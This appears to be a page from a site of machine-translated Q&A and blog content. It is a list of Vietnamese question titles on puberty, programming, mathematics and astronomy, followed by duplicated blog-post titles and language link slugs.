Tôi 19. Tôi vẫn đang trong độ tuổi dậy thì phải không?
Tôi là một đứa trẻ 13 tuổi bị trầm cảm và tôi muốn đi khám bác sĩ về nó, nhưng tôi sợ làm như vậy và bố mẹ tôi sẽ phủ nhận nó chỉ vì nội tiết tố của tôi và những thứ tương tự. Tôi nên làm gì?
Ưu và nhược điểm của Tuổi dậy thì là gì?
Làm thế nào để tôi đặt lịch hẹn với bác sĩ mà không có cha mẹ tôi và họ không biết lý do tôi đến? Tôi 15 tuổi.
Làm thế nào để tôi sống một cuộc sống trọn vẹn nhất với tư cách là một thanh niên 19 tuổi?
Có phải ai cũng trải qua tuổi dậy thì?
Những rào cản lớn nhất để có được RL trong sản xuất là gì?
Bom Ellerman là gì và chúng ta có thể xác định chúng bằng cách nào?
Yêu cầu quyền [tiền tố] [tiền tố] [hậu tố]. [Toàn bộ] là gì?
java: nhận số lượng tất cả các khóa và giá trị riêng biệt trong Bản đồ <Chuỗi, Đặt <Chuỗi>> [trùng lặp]
Có thể sử dụng cây Stern-Brocot để hội tụ tốt hơn $2^m/3^n$?
Cách thích hợp để đóng C # Socket trong .NET Core 3.1 là gì?
Regex_search c ++
Truy xuất giá trị href của trường Liên kết của Mục liên kết trong scriban [trùng lặp]
Tòa án Tối cao có thể tuyên bố một bản luận tội vi hiến không? [bản sao]
Chọn tham gia thử nghiệm alpha cho trình chỉnh sửa Stacks mới
Cách lấy văn bản cụ thể thuộc về lớp div
Phán quyết cho việc tiến hành chiến tranh ở các thành phố là gì?
Kubernetes - Có thể kết hợp Pod.yaml và Service.yaml trong một tệp yaml không (nhưng không có Triển khai)
Người ta có thể mô tả đặc điểm của các anton cực đại theo các mạng phân bố không?
Nhóm danh sách theo các phần tử của danh sách lồng nhau [trùng lặp]
Làm thế nào để biết một mảng có 2 hay nhiều phần tử giống nhau? [bản sao]
“ $\Sigma_1^1$-Peano arithmetic ”- nó có ghim $\mathbb{N}$?
Chúng ta có thể tạo ra điện từ bão cát trên sao Hỏa không? Nếu vậy nó có thể được sử dụng để cung cấp năng lượng cho các khuẩn lạc không?
Làm cách nào để gắn các viên pha lê vào một thanh thầy cúng mà không cần dùng đến chất kết dính?
Mã QR sẽ phải lớn đến mức nào trên mái nhà của tôi để vệ tinh có thể quét nó với độ phân giải cho phép ngày nay?
Tìm hiểu sâu hơn về sự cố bảo mật tháng 5 năm 2019: phản hồi về bài đăng trên blog
Case study: what does it take to formulate and prove Quillen's small object argument in ZFC?
Có xúc phạm không khi giết nhân vật đồng tính của tôi ở cuối cuốn sách của tôi?
"Bốn mươi ngày bốn mươi đêm"
"Họ không cảm thấy tội lỗi và chết"
Joomla Chọn từ nhóm DB AND / OR
Hiệu ứng Wilson: Vết đen mặt trời “sâu” đến mức nào?
Có thể sao Thiên Vương có bề mặt rắn do thành phần bên trong và thiếu nhiệt bên trong?
Ma trận lôgarit của toán tử đạo hàm là gì ( $\ln D$)? Vai trò của toán tử này trong các lĩnh vực toán học khác nhau là gì?
Nếu ngâm chua làm mất đi Vitamin C, thì Dưa cải bắp lại giàu Vitamin C như thế nào?
Tại sao trái cây và rau ngâm không phải là một phần của khẩu phần ăn (Châu Âu) trong Thời đại Cánh buồm?
proxy nginx tới Tomcat với SSL
winforms C # .NET - Cách cải thiện hiệu suất của mã của tôi trong khi sử dụng các vòng lặp (for, foreach, v.v.) [đã đóng]
Chứng minh rằng một dãy $\{a_n\}_n$Được định nghĩa bởi $a_1=-\frac14$và $-a_{n+1}=\frac{a_na_{n+1}+4}4$là hội tụ và tìm giới hạn của nó.
Tôi có phải mở nguồn ứng dụng của mình không nếu tôi sử dụng dữ liệu api chưa sửa đổi được cấp phép theo CC-BY-SA 4.0
Cách sử dụng một từ tiếng Do Thái không phổ biến cho "tỏa sáng" trong Exodus
Cách tốt nhất để sử dụng BeginTransaction bằng cách sử dụng try catch
Về việc một cố vấn tiến sĩ từ chối sinh viên do vấn đề sức khỏe
Nguyên tắc phản chiếu so với vũ trụ
Câu đố trượt 3 x 2
Mặt trăng có tốc độ vừa phải để không đâm vào Trái đất hoặc thoát ra ngoài không gian. Tỷ lệ cược là bao nhiêu?
MOCs: Câu hỏi về việc sử dụng nhãn hiệu LEGO
Làm thế nào để loại bỏ các vành đai của sao Thổ?
Lịch sử thời trang người sói, Phần 1: những năm 2000
Loại bỏ đường viền bên trong trong type = color
Làm thế nào để giám sát giới hạn tốc độ trên đường trong thời trung cổ? [bản sao]
Làm thế nào để liệt kê các công việc k8s của tôi với một LabelSelector phức tạp theo từng khách hàng?
Tại sao các chuyến bay không bay theo đường tiếp cận hạ cánh sớm hơn?
5 kỹ thuật viết sáng tạo dẫn đến bài báo thú vị
5 kỹ thuật viết sáng tạo dẫn đến bài báo thú vị
Một chatbot để kiểm soát nội dung
Một chatbot để kiểm soát nội dung
Im lặng
Im lặng
Tin tưởng bản năng đầu tiên của bạn trong một mối quan hệ là rất quan trọng
Tin tưởng bản năng đầu tiên của bạn trong một mối quan hệ là rất quan trọng
Những gì chúng tôi đang xây dựng vào năm 2020
Những gì chúng tôi đang xây dựng vào năm 2020
Làm cho việc loại bỏ lỗi Luồng cụ thể hơn
Làm cho việc loại bỏ lỗi Luồng cụ thể hơn
Các ngôn ngữ lập trình hàng đầu cho kỹ sư AI vào năm 2020
Các ngôn ngữ lập trình hàng đầu cho kỹ sư AI vào năm 2020
Những lý do nên chọn PyTorch để học sâu
Những lý do nên chọn PyTorch để học sâu
Samantha Lazar
Samantha Lazar
Vòng xoáy của một năm
Vòng xoáy của một năm
Lời mời
Lời mời
Hai kho lưu trữ Python để trực quan hóa văn bản
Hai kho lưu trữ Python để trực quan hóa văn bản
Tận dụng tối đa: Thiết kế UX ứng dụng kết hợp
Tận dụng tối đa: Thiết kế UX ứng dụng kết hợp
Thông báo &amp; Báo thức trong Flutter
Thông báo & Báo thức trong Flutter
6 điều tôi học được từ Brendon Burchard
6 điều tôi học được từ Brendon Burchard
Những người làm việc hiệu quả có thói quen buổi sáng theo nghi thức
Những người làm việc hiệu quả có thói quen buổi sáng theo nghi thức
Làm điều quan trọng nhất với bạn vào buổi trưa
Làm điều quan trọng nhất với bạn vào buổi trưa
Tại sao bạn không nên làm mọi việc một cách cá nhân
Tại sao bạn không nên làm mọi việc một cách cá nhân
5 điểm chung của những người đạt thành tích cao
5 điểm chung của những người đạt thành tích cao
Halloween trên Spectrum
Halloween trên Spectrum
Tôi là một người lớn tự kỷ và tôi ghét Halloween
Tôi là một người lớn tự kỷ và tôi ghét Halloween
Tôi chưa bao giờ nghĩ rằng mình sẽ gật đầu chấp thuận trước Lễ tuyên dương của George W. Bush
Tôi chưa bao giờ nghĩ rằng mình sẽ gật đầu chấp thuận trước Lễ tuyên dương của George W. Bush
Sự xuất hiện của tài chính phi tập trung
Sự xuất hiện của tài chính phi tập trung
Hình dung sự phát triển bùng nổ của DeFi vào năm 2020
Hình dung sự phát triển bùng nổ của DeFi vào năm 2020
ja/shares
es/shares
de/shares
fr/shares
th/shares
pt/shares
ru/shares
vi/shares
it/shares
ko/shares
tr/shares
id/shares
pl/shares
hi/shares
japost
espost
depost
frpost
thpost
ptpost
rupost
vipost
itpost
kopost
trpost
idpost
plpost
hipost

© Copyright 2021 - 2024 | All Rights Reserved